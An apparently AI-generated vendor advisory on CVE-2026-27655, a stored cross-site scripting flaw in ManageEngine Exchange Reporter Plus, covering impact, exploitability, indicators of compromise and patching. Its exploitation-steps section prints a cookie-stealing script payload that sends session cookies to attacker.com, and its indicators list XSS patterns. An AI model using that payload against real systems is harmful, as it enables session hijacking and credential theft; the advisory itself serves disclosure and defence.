CVE-2026-27655
Zoho ManageEngine Exchange Reporter Plus vulnerability analysis and mitigation

Overview

CVE-2026-27655 is a Stored Cross-Site Scripting (XSS) vulnerability in Zohocorp ManageEngine Exchange Reporter Plus affecting all builds prior to version 5802 (including builds 5800 and 5801). The flaw resides in the "Permissions Based on Mailboxes" report within the Reports module, allowing an authenticated attacker with Exchange administrative privileges to inject persistent malicious scripts. The vulnerability was fixed on March 19, 2026, and publicly disclosed on April 3, 2026 (ManageEngine Advisory, GitHub Advisory). The CVSS v3.1 base score is reported as 4.8 (Medium) by NVD and 7.3 (High) by the GitHub Advisory Database, reflecting differing assessments of privilege requirements and scope (GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), arising from insufficient input validation in the Permissions Based on Mailboxes report (ManageEngine Advisory). An authenticated attacker with Exchange administrative privileges can inject malicious script content into report data fields; this content is stored server-side and rendered without proper sanitization when other users view the affected report. The attack vector is network-based, requires low-to-high privileges (depending on scoring source) and user interaction from a victim, and results in script execution within the victim's browser context (GitHub Advisory). The fix was implemented in build 5802 by adding proper input validation to the affected report component (ManageEngine Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any user who accesses the compromised Permissions Based on Mailboxes report, potentially including other administrators. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim within Exchange Reporter Plus, and manipulation of mailbox permissions data (ManageEngine Advisory, GitHub Advisory). The confidentiality and integrity of the application are both at high risk, though availability is not directly impacted.

Exploitability

There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (GitHub Advisory). The EPSS score is approximately 0.016–0.021%, placing it in the 6th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker with Exchange administrative privileges and a victim user who interacts with the affected report, limiting the practical attack surface.

Exploitation steps

  1. Gain authenticated access: Obtain credentials for an account with Exchange administrative privileges within the Exchange organization connected to ManageEngine Exchange Reporter Plus (build 5801 or earlier).
  2. Navigate to the vulnerable report: Log in to Exchange Reporter Plus and navigate to the Reports module, then open the "Permissions Based on Mailboxes" report.
  3. Inject malicious payload: Identify an input field within the report (e.g., a mailbox name, permission label, or custom field) that is stored and later rendered without sanitization. Submit a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.
  4. Wait for victim interaction: The injected script is stored server-side. When another user (e.g., a higher-privileged administrator) views the Permissions Based on Mailboxes report, the malicious script executes in their browser.
  5. Achieve objective: The executed script can exfiltrate session cookies, perform actions within Exchange Reporter Plus on behalf of the victim, or redirect the victim to a phishing page (ManageEngine Advisory, GitHub Advisory).

Indicators of compromise

  • Logs: Unusual entries in Exchange Reporter Plus access/application logs showing report access to "Permissions Based on Mailboxes" from unexpected user accounts or at unusual times; error logs indicating unexpected script-related content in report fields.
  • Network: Outbound HTTP/HTTPS requests from administrator browsers to unknown external domains shortly after accessing the Permissions Based on Mailboxes report (potential cookie/credential exfiltration).
  • Application: Presence of HTML or JavaScript tags (e.g., <script>, onerror=, javascript:) within stored report data or database fields associated with the Permissions Based on Mailboxes report.
  • Browser: Unexpected redirects or pop-ups experienced by users viewing the affected report within Exchange Reporter Plus.

Mitigation and workarounds

Zohocorp has released Exchange Reporter Plus build 5802, which resolves this vulnerability by implementing proper input validation in the affected report component; all users on builds 5801 and below should update immediately using the available service pack (ManageEngine Advisory). As an interim workaround prior to patching, restrict access to the Permissions Based on Mailboxes report to trusted administrators only and monitor report access logs for suspicious activity. Additionally, implementing Content Security Policy (CSP) headers on the Exchange Reporter Plus web interface can help reduce the impact of any XSS exploitation.

Community reactions

The vulnerability was reported to Zohocorp by security researcher "C311" through the Zoho BugBounty program, and Zohocorp credited the researcher in their official advisory (ManageEngine Advisory). No significant broader industry commentary, social media discussion, or media coverage has been identified for this vulnerability beyond standard CVE aggregator listings.

Additional resources


SourceThis report was generated using AI

Related Zoho ManageEngine Exchange Reporter Plus vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-4107MEDIUM5.4
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-27655MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-4108MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-3880MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026
CVE-2026-3879MEDIUM4.8
  • Zoho ManageEngine Exchange Reporter Plus logoZoho ManageEngine Exchange Reporter Plus
  • cpe:2.3:a:zohocorp:manageengine_exchange_reporter_plus
NoYesApr 03, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management